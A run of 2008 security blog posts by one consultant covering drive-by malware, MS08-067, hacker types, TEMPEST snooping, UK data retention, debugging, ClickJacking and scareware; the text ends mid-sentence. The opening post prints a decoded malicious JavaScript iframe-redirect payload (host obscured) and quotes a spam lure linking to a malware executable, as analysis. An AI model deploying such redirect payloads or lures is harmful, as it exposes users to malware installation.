What I used to see often is that the page that was passed back to the browser in response to the GET request would be targeted at the version of the browser version and the vulnerabilities that were current or recently patched. Storm used to do this, even creating custom binaries on the fly. Now, there was a fancy malware for you. What I am seeing more and more is that drive-bys just rely on social engineering. Here is the anatomy of a particular attack:

The come on:

These vary but a fairly common form (and the one that I was looking at) is a message on facebook claiming that someone has pictures or a video of you. It seems to come from a friend but it is very nonspecific – well, it is a hijacked account and the method is to send many of these messages and expect a low success rate. Again, that is fine since none of this cost the black hats anything.
Typically, the link will go via Google (with a unique search string) or sometimes TinyURL. Most people see the start of the URL as going to a reasonable site and follow the link if they look at all. Many don’t; these are home users.

The initial page:

This will typically just be a page of Javascript. I have seen many dozens of variants but they generally look very similar. There is a large static array of values and then a bit of jscript that decodes the array into a string. The encryption is crude in every way. Typically the array will be ASCII values with a largish offset – say 605. It is easy for the black hat to choose a different offet which means that it is not practical for pattern recognition internet security packages to look for a given pattern of values. Also, there are more ways of phrasing the code than one so the pattern is trivial to change.
The string created is then pushed through the eval function.

The payload 1:

Here is the code that it executes:

function uybhutgyaalih(query){
var url = 'http://(malicious URL)/go.php?sid=4';
if (window.XMLHttpRequest){
var dx = '1500px';
document.getElementById('o').style.width=dx;
document.getElementById('o').height='5000px';
document.getElementById('o').innerHTML = '{iframe border=0 scrolling=no width=100% height=2800px src='+url+')(/iframe)';
}else if(window.ActiveXObject){
var dx = '1500px';
document.getElementById('o').style.width=dx;
document.getElementById('o').height='5000px';
document.getElementById('o').innerHTML = '(iframe border=0 scrolling=no width=100% height=2800px src='+url+')(/iframe)';
}else{};
}

Well, nothing too clever there. It takes you to another site via an iframe. Why an iFrame? Because no URL will be displayed. I have obscured the URL here but there are thousands of hosts out there. Many of them are listed here. Oh, and I replaced the angle brackets with round ones because they confused the blog spot editor.

The payload 2:

This is where the link in the iframe takes you. This is where you would expect all the cleverness to be. In this case, nothing at all clever. There was a web page with a video that was (in this case) audio only. Typically, there will be the sound track of something, often a porn film. I haven’t the expertise to identify the film from the sounds. Sorry. There was a bitmap shown over the video that said that there was a missing video codec and seemed to be a typical OK/cancel dialog for XP. In fact, the whole thing was a bitmap and clicking anywhere would download the EXE installer that would give you a nice fresh copy of an Rbot variant.

So, there was nothing at all odd or especially bright about this attack. It was a typical drive-by based on social engineering. Why do the gangs use such a simple approach? Well, that would be because it works just fine. Anything more would be an unnecessary expense.

Oh, I mentioned wormable vulnerabilities. What we saw in the past was rapidly spreading worms, typically malicious and without much of a payload although SDBot was an exception – it was actually a proper trojan client (bot) with multiple modes of operation though it was mostly used for SPAM. Anyway, traditionally worms would spread so aggressively that they would effectively form a denial of service on the network and stop their own spread. Even if they network stayed up, admins were alerted very rapidly because of the abnormal network load. We might see fast spreading worms again but I think that they will be from amateurs. I think that the professionals will go for low and slow next time. You really want to infect as much of the network as possible before detection – and I would expect the worm to install a proper multi-purpose bot, probably polymorphic to survive better – and possibly based on Storm’s peer to peer architecture to make it more robust.

Are there interesting times ahead? I suspect so.

Signing off

Mark Long, Digital Looking Glass

Thursday 30 October 2008

Near misses

Hello all

It has been an interesting few days for me. I have been involved in a couple of things that I can talk about and a few that I can’t. So, on to the ones that are fine to chat about.

Microsoft released an out of band patch – let me remove the jargon around that. There was a security update that came out when it wasn’t a regular patch Tuesday. Patch Tuesday falls on the second Tuesday of the month except for the March before last when there weren’t any. Well, this one (MS08-067) was released on October 23, 2008 which is fairly close to the November patch date which will be the 11th – I don’t have any inside information but that would be what every system administrator expects and the MSRC blog should confirm that soon. So, this out of band patch was released pretty much in the middle of two patch cycles and that would mean that it was something special.
Well, it is. From the bulletin (and again, no special knowledge here), it was a vulnerability in the computer browser service and the server service. The question that MS always ask themselves when a vulnerability is reported or found is “Could this be used to write a networked virus, or a worm for short?” For the answer to be yes, the following things have to be true:


1. It has to be a remote code execution vulnerability.

2. It has to attack software that is running all the time on vulnerable systems

3. It can’t require user action for the exploit to work

Well, this one ticks all those boxes. It is an RPC based vulnerability. You have probably heard of a worm that used an RPC vulnerability. Blaster did that. However, this wouldn’t be as limited as Blaster since it affected more versions of Windows. Accordingly, I would advise installing this one pretty damn quickly. The proof of concept code was released on the 24th and the black hats have it now. Oh, and just to add to the fun, the malicious code would be running as SYSTEM and would be able to do what it liked to the target machine.

One of the things that I did related to this was quash a rumor that Microsoft is releasing viruses that utilise flaws in Microsoft software. I have heard that one so many time and it has never made sense to me. The point of malware is to put code onto the box that the attacker wrote. What a Microsoft written virus would do would be to... uh, well, patch Windows. MS already has control over what code is in Windows. As for the motive, that is even more puzzling. Do you think that Microsoft wants to steal your product keys? They already have loads. Your credit card details? I think that someone would notice. No, the main reasons that I hear behind this insane rumour are that it is to force people to install patches (uh, they are provided free so where is the motive) or to encourage sales of Microsoft Antivirus products.

Did you know that Microsoft markets anti-virus products? Their home anti-virus is called One Care and it is not a huge seller. The business solution is Forefront Client Security. They are decent enough products but could the profit possibly be worth doing something illegal and easily traceable to the company that is perhaps the most monitored company in America? Clearly not. Also, given the respective market shares, this would help Microsoft’s competitors much more than it would help Microsoft. Clearly, this is nonsense.

However, imagine that I believe that MS kicks puppy dogs and eats small children. Imagine that I didn’t know for a fact that MS doesn’t do these things and that they can normally be traced to some well known sources. The question would be, why on earth would Microsoft bother? There are hundreds of malware writers, maybe even thousands, who will write these things for free.

The other thing that I can mention is that I saw a SPAM email the other day. Nothing odd about that. This one read:

“Good day.
You have received an eCard

To pick up your eCard, choose from any of the following options:
Click on the following link (or copy & paste it into your web browser):

http://SomeWebsiteInFrance.com/e-card.exe

Your card will be aviailable for pick-up beginning for the next 30 days.
Please be sure to view your eCard before the days are up!

We hope you enjoy you eCard.

Thank You!

http://www.123greetings.com”

The website was actually listed and had been hacked using a fairly simple attack. There is nothing unusual about this as a technique but it reminded me so much of the first wave of attacks that built the Storm bot net, now largely defunct. However, this malware proved to be the much less interesting Zbot while Storm was an evolution of RBot. Storm was much more flexible and much more resilient than Zbot – and the malware servers were the bots themselves rather than a normal website. It did look very familiar for a moment though as some of the early cases were used hacked websites as the hosts before they developed their fast flux DNS capability.

Anyway, I helped out the company that got hacked. It didn’t take long so there was no charge in this case. They wanted a French speaking consultant so all that I did was prepare enough information to hand over and let them find their own man.

So, it has been something of a week of "might have been"s

Signing off

Mark Long, Digital Looking Glass Ltd

Monday 27 October 2008

BBC reports rise in script kiddie activity

As you may have noticed, I like to keep an eye on the main stream media as well as the technical press. When you see a technology story appear on national news, it is either an important news story or a slow news day – but what is news to one person might be olds to another. So, the BBC report that young people are getting more involved in hacking. So, what triggered this comment? Why, that would be this BBC video

What they have there is known in the trade as a Script Kiddie. They blur the screen but it is clear that one of the forums is talking about the world’s easiest and commonest attacks, the SQL injection attack. It may be easy to do but that doesn’t make it less effective. Quite the reverse. Some very big names have been hit by that one. So, it seems that kids are being more active in low level cyber crime. Let us look at the various types of hacker that might be testing your web based solutions or sending files to choke your app through email.

The Script Kiddie. The script kiddie gets very little respect. Even the journalist was not much impressed by that one. They tend to be scavengers, picking crumbs from a rich man’s table. They will use techniques that they have learned from more experienced hackers. You might think that people with useful hacking skills would keep these things as trade secrets. Well, some do and some don’t. Those that don’t feed the script kiddies. One thing that is new is that they seem to be doing this increasingly much for profit. They used to “tag” websites with their screen names or just cause damage but it seems that they are now dabbling in a little credit card fraud. Well, times are hard and pocket money is not as easy to come by. They are sometimes minors and rarely over the age of 20. 18 is often a critical age because at that point, it stops being a problem for the parents and becomes an offence against the 1990 Computer Misuse Act punishable by 6 months to 2 years in the UK. You can get longer in the US, of course. British law is rather lenient in this regard.

“Hacker” is a bit of a problematic term because you can be a hacker and never once compromise someone’s security. A hacker can just be someone who codes down near the metal which always struck me as damn good fun. Rather than hacker, let us talk about hats.

White hats are hacking for non-malicious and generally legal reasons. You can hire white hats if you want. Just look for “Penetration testers” which is what they prefer to be called. Oh, while I am on the topic, Digital Looking Glass will be launching a PenTesting service next year. Some companies combine testing and penetration testing and that gets a lot of the glitches out of the software before it is released. It makes testing very slow and expensive but you pay your money and take your choices. There are also universities that study the techniques and responsibly report flaws to the software authors.

Grey hats have the same skills and they use them for… well, other reasons. They are not normally criminals or at worst will only break civil law rather than criminal law. As with so many things, there are shades of grey. Some will work with software vendors to get vulnerabilities fixed. Others will write exploit code and publish it to “encourage” the vendor to fix the bugs. You better bet that the script kiddies love sample code, especially when it is in a high level language that they can understand. A lot of the rootkit developers were nominal grey hats. The rootkits that we find in commercial malware (yes, there is such a thing) are normally pretty much unchanged from the sample code provided by the grey hats. The code is readily available. No really. Don’t believe me but see for yourself. Just go to www.rootkit.com. You will find a lot of script kiddies begging in the forums.

There are lots of other site for the aspiring and practicing hacker. Here are a few that I have been to in the last week:

www.hackthissite.org An excellent site with graded exercises to enable anyone to learn how to crack systems. The forums are also very useful.

www.port7alliance.com/txt/hackbg.html is a bit less up to the minute but has some nice exercises for helping the scripters make progress towards the big time.

http://www.cultdeadcow.com/ The cult of the dead cow is a well known group that have produced some remarkable tools such as Goolag which uses Google to search for vulnerable parts of sites.

http://www.governmentsecurity.org has a whole collection for a range of platforms – the formatting is not excellent but the material is generally very good.

There is plenty of material out there. If a grey hat wants to go black hat or a script kiddie decides to play in the big time then the techniques are no further away that your browser search bar. So, what sort of black hats are there?

There are some who work solo – not all computer users play well with others. They will typically be looking for anything that they can get. If they find a home system, they will gather credit card details if they can and pay for their web use for a while. Small amounts are likely to go unnoticed for a while. If they get into a company network and can steal a few then they will sell then. A good solo worker with the right connections can clear $250,000 which is not too bad when you don’t file a tax return.

The black hat gang. There are some small independent groups but generally they are run by another group. The hacker gangs are generally small although there have been reports of larger ones in China. Some have suggested that corrupt government officials are running them. Well, I don’t know because they don’t publish their accounts. All that can be said for sure is that the security guards who were standing outside were wearing Chinese military Uniforms and armed with the AK47, just like Chinese military usually are. As for the non-military ones, a lot of them are eastern European. The Solntsevskaya and Dolgopruadnanskaya organisations run multiple cybercrime gangs. They have a number of approaches. There are botnets which are used for extortion (denial of service against websites, typically online casinos), SPAM, data gathering (passwords and credit cards) and rental. They have phishing operations too – typically against western banks but also against paypal and similar organisations. Sometimes these are combined. I have seen spam bots churning out spam advertising the stolen credit card numbers for sale. I had to get the message translated. Of course, that could well have come from the next type of black hat. Some of them will be looking for whatever they can get, working much like solo black hats. You can hire them by the hour if you know the right people.

Finally, there are state run black hats – or maybe white hats. It depends where you are standing. After all, we sponsor freedom fighters and they sponsor terrorists. A number of states definitely have some very smart people hacking for them. Is this good or bad? Well, it depends on the target. The computer that you are using depends on principles developed in Bletchley Park, Station X. That was a project to break German codes and it gave us the finite state machine.There are ethical questions there which I can’t answer.

So, the BBC may well be right in saying that younger kids are getting involved in cybercrime – but let us be honest here. It is not as if there was a shortage of cybercriminals without waiting for junior to grow up.

Interesting times indeed

Signing off,

Mark Long, Digital Looking Glass Ltd

Tuesday 21 October 2008

How private is private? Not so much.

Swiss PhD students from Swiss Ecole Polytechnique Federale de Lausanne have been trying to sniff data as it is typed on a keyboard. That is something that they are supposed to do since they work in the Security and Cryptography Laboratory there. They have been listening to the radio signals emitted by keyboards including laptop keyboards. They were doing this mostly with keyboards that were not attached to PCs to reduce the amount of radio mush that was in the environment. A quick attempt to recreate the experiment using a $4 radio purchased at Woolworths did not give any results but there is no doubt that snooping of this sort can be done.

The traditional way of using a radio to snoop on a computer was to look for emanations from a CRT – a conventional monitor has an electron stream whipping backwards and forwards, painting a frame dozens of times a second. With a monochrome monitor, this was easy enough but much harder with colour – and the higher resolution made it harder still. There was a paper written by Wim van Eck, a Dutch researcher, back in 1985 which described the technique. This became known as TEMPEST (Transient Electromagnetic Pulse Emanation Standard). This wasn’t too hard from CRTs because there was a lot of power going through the monitor and accordingly a lot of radio emanations to tap into.

There was also a technique referred to as optical TEMPEST that used the same principle as the light guns on the old Nintendo Entertainment System. The electron beam swept the screen 50 times a second on a conventional TV – actually twice 25 as the frame was interlaced with half of the picture painted each time. When the trigger was pulled on the light gun, the target (for example, a duck) blinked white and the light gun would, if correctly aimed, see this in its narrowly focussed barrel with its crude light sensor. No flash? You were not aimed at the target.

However, this could be refined. You could have a very fast camera look at the screen and record the variations in the luminance of the screen and work out what was being shown on screen. Ok, not so interesting because you can see the screen anyhow – but here was the kicker. You didn’t have to see the screen, only the light from the screen. That is reflected from things in the room and can, with the right equipment, be detected from a long way off. The reflection would vary microsecond by microsecond giving you a fuzzy rendition of the screen after much processing. Of course, none of this works with LCD monitors because they don’t scan that way. The monitor is always back lit and pixels change when they change – or more accurately, the red, green and blue elements change and several of these make up a pixel. Because the old techniques don’t work as well with LCD monitors, research has moved on to detecting the much smaller signals output by the digital electronics. This is a trickier proposition but not impossible, as has been shown here. In practice, it would be harder still to do because computers rarely live in an electrically quiet environment. They are often surrounded by other computers and sources of radio emissions. I am writing this from home and I live in the countryside. I can “see”:

- 4 wireless networks, one of which is mine
- My mobile phone which is connected to the provider, the wireless network and via Bluetooth to a keyboard
- My PC wireless keyboard
- My PC wireless mouse
- My toothbrush (I have an Oral B Triumph and it has its own wireless network. Why yes, I am a geek. Thanks for noticing)

Because it is cold, the fan heater is on and it is generating radio mush. I am listening to one of my favourite folk singers and the room is wired for Dolby surround sound and none of the speaker wires are shielded. Come to that, nor is the phone line that is carrying the broadband that I am posting this with is not shielded. That will be generating some noise. That is in a quiet country location. Imagine how much worse a city office is.

Of course, there is one advantage to these techniques over conventional key logging software that runs on the PC. These are undetectable. Key loggers can be detected if you know how they hide. However, key loggers can work even inside a Faraday cage. Still happy that your system is all that private?

Signing off

Mark Long, Digital Looking Glass Ltd

Thursday 16 October 2008

1984 project delivered late? Big brother database.

You have probably seen the splashes on the news pages. The British government are considering a database that logs a degree of internet traffic. There is a report here if you missed it

What are they considering logging? Well let us look at what is currently logged. Details of the times, dates, duration and locations of mobile phone calls, numbers called, website visited and addresses e-mailed are already stored by telecoms companies for 12 months. Any of these details are surrendered to an appropriate agency on request. The proposal is that these records should now be held for 2 years and be held directly by the government.

Jacqui Smith went on to say: "There are no plans for an enormous database which will contain the content of your emails, the texts that you send or the chats you have on the phone or online.”

Hmmm… let us consider what is being said here. Not the content then. What reasonable use would there be in storing the email header information only? Well, you would have the IP address it was sent from, the email account that it was sent from and you would have the time that it was sent. That is no great trick for SMTP since it is sent in plain text by default. SMTP (mail) protocols are really just special purpose TCP/IP chatter on port 25. This stuff is defined in RFC 821 and 822. It is easy enough to log that stuff if you can record any packet on a network. You can do similar things for IMAP and POP3. So, to effectively you would need to be sitting on the email servers to record this. Ok. The UK government can enforce this on UK servers if they want to – you can’t fight city hall… but what if the email is not on a UK server? Hotmail is not based in the UK and I am willing to bet that it doesn’t internally use SMTP or IMAP – when sending a message from one hotmail user to another, you are effectively doing a database operation and that is how I would implement it if I were you. I bet that most web based email services such as Yahoo, Gmail and so on work that way. The UK government could ask Google to send it this data but would they? It seems unlikely. How about imail.ru (a Russian free webmail) or maktoob.com which is in Jordan. Now, Jordan and the UK get on pretty well but would they reasonably hand over that sort of data to the UK government? I don't think so. The Russians? Even less chance. There are hundreds of web email providers.


Oh, and here is something else that makes me wonder. You know why the industry doesn’t chase down the people who send the SPAM? Well, how would you tell who they were? It is trivial to fake an SMTP header and that is what the spammers do. There is nothing to stop the terrorists doing the same.

How about SMS messages? Well, they are a bit different because the whole message is sent as a packet. Longer messages are sent as multiple messages and stitched back together later, it seems. The message and the header are all in the same packet. I suppose that a scheme could overwrite the message content before recording the packet to a log but I would be surprised if that were done. The Multimedia Messaging Service protocols are more complex and more problematic.

Logging all phone numbers and times of calls and location of the caller? Well, that is pretty powerful if you know who the number represents. More than 75% of the UK population have a mobile phone. What other government can claim to be able to track 75% of their population at any time? Of course, pay as you go phones can be a problem. Pop into Tesco with some cash and you can buy a phone and some air time. Name? You are not required to give it. You want a free SIM card? You can have a dozen. Companies want to give them away. Why would a terrorist use the same one twice? This measures strikes me as an excellent way of monitoring the honest and the stupid but a rotten way of monitoring the intelligent and devious. There is also the question of the sheer volume of data as there is with emails. There are 60 million people in the UK roughly. About 75% have a mobile. That is 45 million mobiles to track. Some of those are teenagers who send dozens of texts a day. That could easily be 450 million texts per day. That is more than 160 billion texts per year. Good luck analysing that many. As for emails, that boggles the mind. There are more than 100 billion SPAM emails per day. Britain punches above her weight her because computer ownership is common. Let us say that 5% of these are in the UK. So, 5 billion SPAM emails per day. That is 1.8 trillion emails per year. Good luck in storing and scanning all those.

Hmmm… what websites were visited? That could be a useful one. In the course of writing this post, I have been to over 100 sites and I made no attempt at all to hide where I went. I don’t mind anyone knowing that I was looking at news sources and RFCs. Had I minded, I would have used a proxy. There are over 2000 free web proxies, hardly any of which are in the UK. You could investigate everyone who uses a proxy, of course. He who would keep a secret must keep it secret that he has a secret to keep, if I may quote Carlyle. You would be looking at trillions of web addresses each year though. It would be difficult data to mine. Where would you capture the data? The DNS servers would seem to be an obvious choice but I don’t need to go via a DNS server at all – indeed, the local cache serves most of my needs and I can keep a hosts file as large as I need. I don’t have to use a UK based DNS service at all and unless data is harvested at every router along the way, I don’t see how the traffic could be recorded as it doesn’t go through a central point. Again, you can monitor those who let you but those that want to slip through the net will find it easy enough to do so.

What about other forms of communication? Instant messaging would be hard to monitor – text messages for most types go via the server but voice and data go from peer to peer via UDP. That would be hard to monitor without something very like the Bundestrojaner, a bit of software created by the Austrian government to monitor individual computers using malware type techniques. That would be politically difficult to implement widely. Audio and video data is hardest yet to capture and when you look at structures like the Skype cloud architecture where there is little centralised control, it is tempting to throw up your hands in horror.

Of course, the more data you collect, the less effective your screening is. You really want to monitor the smart and criminal ones – and you have data on the dumb and the honest. You have so much data that it could only be analysed by machine, even if you have an army of spooks. The more data you have, the lower the signal to noise ratio and the less intelligent scrutiny you can give to the signal.

The problem is actually still worse. Let us consider what data related to terrorism might look like. Would it be a message saying “On Tuesday, we will meet at the town hall at 7:30. You bring the semtex and I will bring the guns. If wet, meet in the King’s head”? Why would it be in English? Why would it be in plain text? I could send that information as an MP3 of speech, as a JPG, as a video, as an encrypted file or hidden in a dozen ways, many of which are well known and have been used in dozens of films. We can safely assume that any terrorist worth his salt can do 20 minutes research. Code books are old hat but they still work. No scanning program can work out whether a discussion of the health of an aged relative really means something different when decrypted the old fashioned way with a look up reference such as the old book ciphers. There are also some cool things that you can do with steganography.

So, what does this cost us if it is implemented? Well, maybe not much. If the data is mostly ignored then there is little loss of liberty and the intelligence services will not be wasting much of their time. It might be useful in a case where our friends in the Office for Security and Counter Terrorism were trying to work out who a suicide bomber had been talking to.

However, if it is misused, it will have a massive effect on civil liberties and will blind the intelligence services because there will be too much data to ever process.

There is also a problem that you always have to consider. Even if you trust this government (and I am making no statement at all on that), do you trust every government that will come after? Will none of them use this to oppress their opponents or police the ranks of their own party? Will no future government use this to control its population? Forever is a very long time. There will be a bad leader some day. I leave it to you to decide how happy you are with that thought.

Signing off

Mark Long, Digital Looking Glass

Tuesday 14 October 2008

Debugging war stories

Fishermen tell of the one that got away. Golfers tell of the amazing shot that happened when there was no-one to see. People who like debugging (and we are an odd breed) tell of the worst bug that they ever faced.

Well, there have been some really obscure ones. There was one that I tried to find every working day for 4 months in an operating system where the problem took 40 minutes to create, couldn’t be automated, there was no debugger and the crash killed the OS stone dead with no diagnostics. That was one to remember but with modern tools, you don’t get that sort of thing any more. Modern nightmares are a bit different and I would like to talk about some of the ones that I sometimes see. Oh, most of these will be in C++ because it makes more sense that way. They also happen in the runtime systems of various languages, most of which are in C or C++.

References to COM objects fail apparently randomly with a null pointer or a pointer that leads to garbage but there doesn’t seem to be any error in the code. Ah, how often have we seen this one? A variant is that a DLL has disappeared between function calls into it. The explanation is simple – the reference count is wrong so the (whatever type of thing it was) unloaded. You can’t see what unloaded it because it was on another thread or the system has cleaned it up under you without you doing anything because it looked unused. That is always fun because there can be dozens of areas in the code where you are seeing the access violation and you don’t know if you are seeing one bug or a dozen. It is relatively easy to track these down with a little judicious breakpointing and stepping just so long as you consider that you are altering the behaviour as soon as you add a debugger. If it doesn’t reproduce when there is debugging or tracing, oh, that can be a horror.

Data being wildly wrong for no obvious reason, more or less at random – for example, maybe you get a currency value that was fine when it went into the record being NAN (a binary pattern that can’t be a number) when you come to use it. Old hands will recognise that one as being probable heap corruption. There are great tools to help you with that one. If you are a fan of WinDbg, have a look at the GFLAGS command. In managed code, you can get similar things if you pass a data structure of some kind to an unmanaged DLL and don’t pin it in memory. As with the previous example, the cause of the crash is nowhere near where the actual error is. These are nasty types of error for most people but there are techniques for dealing with them.

Memory leaks used to be very popular – and very often misdiagnosed. People are sometimes a bit confused by memory usage. As regular readers of my old blog know, I am a big fan of object brokers. If you haven’t come across them before, they are memory allocators that you write yourself that will give you an object to use when you need it and you return it when you are done. From the point of view of the client code, what you have looks a lot like the heap – I ask for a blank MyObj structure by calling a function and I get a pointer. When I am done, I return it with a different function. They are not called new and release but so what? The difference is that the object broker isn’t creating and destroying them – it is maintaining a pool of them and they are not taken from and returned to the heap. I always like to have my object broker tell me how many objects it currently has on loan. That makes debugging memory issues much simpler. Oh, and some people will tell you that there is no need for object brokers now there is the low fragmentation heap. Well, I will hang on to mine. Why have the system do work that it doesn’t need to do? However…

Object brokers often cause reports of memory leakage. A common concern was that more memory was being held after an operation than before it. A lot of people raised this issue in the early days of managed code. What you commonly see with code that uses one or more brokers is that the memory usage will grow and then reach a stable plateau with a little variance caused by allocations that are not brokered – and there will always be some of those. It is always worth waiting to see if a rise in memory levels off after a while before deciding that you have a leak. However, you can get a situation with managed code where the garbage collector is overwhelmed and under very heavy load, the memory grows until the GC is forced to collect because allocations would otherwise be impossible. This is a pretty major housekeeping job and it requires access to a good deal of memory to keep track of what is going on – and there isn’t take much memory around because the process space is full of objects waiting for GC. Things get messy then.
Multithreaded hangs are always tricky and I have spoken at length about them before in my old blog. Nothing much has changed about how you debug those. It is still like trying to untangle a mad woman’s knitting in the dark while wearing gloves. This is certainly one case where prevention is much better than cure.

Of course, there are also logic bugs but each one of those is subtly different and it is hard to come up with a common approach more detailed than “Step through it and see what it really does”.

When I was a dev, I was told that I spent too much time debugging code but I have to say that the experience has stood me in excellent stead.

Signing off

Mark Long, Digital Looking Glass Ltd

Thursday 9 October 2008

ClickJacking, the new kid in town

There is a lot of buzz about this at the moment. I thought that there would be after it was requested that it not be mentioned in the OWASP meetings So, what is it?

Well, to start with, let us say what it isn’t because that is important.

It is not:



1. A single exploit. It is a class of exploit rather than a specific example.

2. It is not a really a remote code execution sort of vulnerability so it doesn’t allow an attacker to take complete control of your system. It is more like a cross side scripting attack against the browser if such a thing were possible.

3. It is not a code defect in any particular browser and it is not a bug in Macromedia Flash. The first proof of concept just used Flash.

4. It is not browser or OS specific.


What it is:


1. A browser based exploit. If you are not viewing HTML, it can’t have an effect.

2. A way of getting a mouse click on a web page to mean something other than what the user means it to mean.*

3. A way of getting the browser to do what it could already do had the user asked for it

So, the exploit hijacks a click hence the name ClickJack. By why did I put a * by the side of the entry? Well, that is because the name is a little misleading. No-one else seems to have mentioned that you should be able hijack keystrokes that have the same effect as mouse clicks. I am willing to bet that you have accidently hit on this functionality a dozen times. In a text box that doesn’t accept multi-line, hitting the enter key will normally submit the form – I have cursed a hundred times when a logon was submitted without the password because I typed Enter when I meant Tab. Backspace takes you back one page. Tab and Shift Tab change the focus and that can fire an onFocus event. Accordingly, I don’t see that this is limited to mouse clicks.

What could be done with this class of exploit?



Well, the proof of concept was rather clever. It fooled the user into turning on their microphone and web camera. There has been malware that did this and then relayed the image before and it was much loved by paedophiles. However, this was just a proof of concept and didn’t do anything malicious.
Essentially, a malicious page could persuade the user (through social engineering) to take an action such as clicking a button that could be converted into a click somewhere else on a page. In the case of the proof of concept, it was a dialog provided by flash to enable or disable the webcam and microphone features on Flash. However, it could be used to submit a form or open a new link – basically, whatever you could trigger with a click. It hijacks the click for its own purpose.

So, what does this add to the mix? Well, not as much as you might think. Pages that advertise scareware tend to be one big bitmap including the “close” button and any action takes you to the next stage in the process of installing the “potentially unwanted software”. Essentially, when you are viewing a malicious page, any interaction with it was likely to do things that you didn’t want. So, Clickjacking is another way that this can be done.

How does it work in practice?



That hasn’t been made public but it is fairly obvious how you could do it. If you put the object that you want clicked under a graphic that the user will click on and then make the graphic invisible for part of the time, the graphic will seem to flicker – and repeated mouse clicks will sometimes hit the graphic and will sometimes hit what is underneath it. That sometimes happens in regular form based programs when controls are hidden and shown to customise the form. The required DHTML is trivial. Maybe you could have a simple game where the user has to click repeatedly on a butterfly as it flits around the screen. That would do the job nicely. The best use for this would probably be to hack a bank site or a stock trading site to add a malicious iFrame that covered the real content of the page. Of course, if you can do that, you have probably already won.

Mitigation



Well, the old rule applies. Do not interact with sites that are malicious. Of course, the malicious functionality could be in a banner ad or something like that and accordingly, clicking on banner ads may be unwise. I never do it anyhow which must come as a disappointment to those that pay for these things.

Running the browser with fewer rights is always a good idea. On Vista, Server 2003 and Server 2008, this is the default state. On Linux, you can spawn the browser with lower rights manually. This doesn’t mean that you won’t get exploited. It just means that the exploit will be able to do less.

Disabling DHTML in emails (again, default post server 2003) is also helpful.

Fixing the problem



Now, that is a tricky one. A lot of people want this fixed but it isn’t a security flaw in the classic sense. There is no buffer overrun. The browser is doing what it was asked to do. If you fool people into clicking the wrong thing then that isn’t really anything that the browser can fix. I think that you would need to disable at least the following things:

* Making controls visible or invisible under script control or in response to events

* Allowing controls to move under script control or in response to events

* Allowing irregular shapes

Doing that would break a lot of critical sites.

Hope that this information was of use to you.

Signing off,

Mark Long, Digital Looking Glass Ltd.

Tuesday 7 October 2008

Who is liable for computer crime? Us, apparently.

I have, in the past, had the good fortune of helping the police with their enquiries. I don’t mean that in the euphemistic sense of “arrested but not yet charged” but in terms of answering technical questions such as “Does this record in this structure mean that the document was once edited on a Macintosh computer?” As computers have become more and more integrated parts of our society, so they have become part and parcel of police work. Of course, some bits of detective work are harder than others. I read with interest that a car thief, specifically a Mr Aarron Evans, had been successfully prosecuted in Bristol after a camera equipped car caught a clear and readable image of his neck. Mr Evans had been kind enough to have his name and date of birth tattooed onto his neck making the investigation a lot easier.

Sadly, most cases are not that easy. The House of Lords Science and Technology Committee will be asking the government to do more against online crime. Some of the proposals from the committee will be a challenge to the industry including holding software developers liable for security flaws in their software. I can see that one getting very expensive very quickly and possibly killing off some shareware providers. A smallish company would struggle under a hefty fine, especially in these difficult days. However, I am talking about policing here and it would be tricky for the police (because where else would crimes be handled) to assess how serious a software flaw was. That recommendation has not (yet) been passed into law but it opens up a whole can of worms for the software industry and the police alike. Imagine a website being hacked to host a malicious download – an everyday thing, really. Is the web developer liable for the damage done to those that downloaded the component? That would seem to be the literal reading.

Ahead of Friday’s session, Lord Broers, chairman of the committee said:

“In our initial report we raised concerns that public confidence in the internet could be undermined if more was not done to prevent and prosecute e-crime. We felt that the Government, the police and the software developers were failing to meet their responsibilities and were quite unreasonably leaving individual users to fend for themselves.

Some of our recommendations, such as the establishment of a specialist e-crime police unit, are now being acted on by Government. But others, such as software developers' liability for damage caused by security flaws and enabling people to report online fraud directly to the police rather than their bank, have either been ignored or are awaiting action.”

The bolding was mine.

Apparently there is going to be a replacement for the e-crimes police force that was disbanded in 2007. In a world where the required skills are rarer than hen’s teeth, there are going to be a lot of people scrabbling around to get things looked at and, where needed, fixed.

The discussion of the committee’s report is at 12 PM (GMT+1) on October 10th – the url for the live webcast is http://www.parliamentlive.tv/

Interesting times, gentle reader

Signing off,

Mark Long, Digital Looking Glass Ltd

Wednesday 1 October 2008

Scareware? No thanks

Sometimes it feels like I am a lone singer in the darkness. It is always nice to know that I am really singing with the choir. I have been rattling on for quite a while about social engineering and greyware – that is to say software that is essentially useless and misleads the user into installing it. Some people use the phrase “potentially unwanted software” instead which is thought to be less legally actionable but I will never learn and will continue to say what I think.

Anyway, according to the dear old BBC, my former employer and Washington state are taking joint legal action against both Branch Software and Alpha Red, two companies owned by the extravagantly named James Reed McCreary IV. The most problematic of these “potentially unwanted softwares” was one called Registry Cleaner XP which is not the old programmers tool popular back in the late 90s but a rather different application that seems to be sold from this website - Please don’t install it unless you think that my opinion and that of my former colleagues is a nonsense. I do not recommend this software. The state of Washington suggests that the fine should be $2000 for each false warning made by this software. Since it is not unusual for this software to pop up over 200 warnings over the course of 24 hours and we are talking of thousands of systems, the fine c ould mount up rather quickly indeed.

Let us think for a moment though. What could a registry cleaner actually do? Well, we need to consider what the registry is – this is the XP version. If you are interested in what is different in Vista and Server 2008, please let me know. By the way, no trade secrets here. All of this information has been revealed in one form or another over the years.

The registry is a database of entries on a huge range of different things. Let us look at the sections.

HKEY_CLASSES_ROOT relates to COM objects and who would have thought that there were so many of them? File associations, Class IDs, interface IDs for COM components that can be remotely instantiated and such like are stored here. So, how could you have duff entries in here? For developers, it is pretty simple – developing new COM components all the time meant that there were a lot of dead entries in here unless the developer took good care to clean up the box. Visual Basic 6 was a bit of a devil for bloating this section of the registry. It allowed you to extend a COM interface which technically speaking you really shouldn’t be able to do and it fudged the mechanics by using interface forwarding which was completely undocumented last time that I looked. There were two results of this. The first was that you could change the interface of a COM component and the clients that expected the old interface would still work on that machine but probably not on a client system which is not actually that much use for a developer tool. The second was that you ended up with a great many registry entries pointing at other registry entries. The sensible thing to do was to break compatibility, get new GUIDs and compile the client and the server into a clean version but that left a lot of dead entries. There was a little utility written by a support tech that went through the class IDs and interface IDs and deleted the ones that didn’t point to a valid file. This stopped being useful with hosted components where the reference was not to a simple DLL or EXE but instructions to MTX.EXE or these days SVCHOST to instantiate the component. Running this tool would probably break a modern operating system pretty badly but it was the bee’s knees in 1998. So, that was the only registry cleaner that ever had a good excuse for existence in my opinion. Could you get dead entries on a normal end user XP box? Well, if they deleted an application that was a COM server or had a file association without uninstalling it, then yes, it would happen but to be honest, a handful of redundant references would have little effect on performance. The only 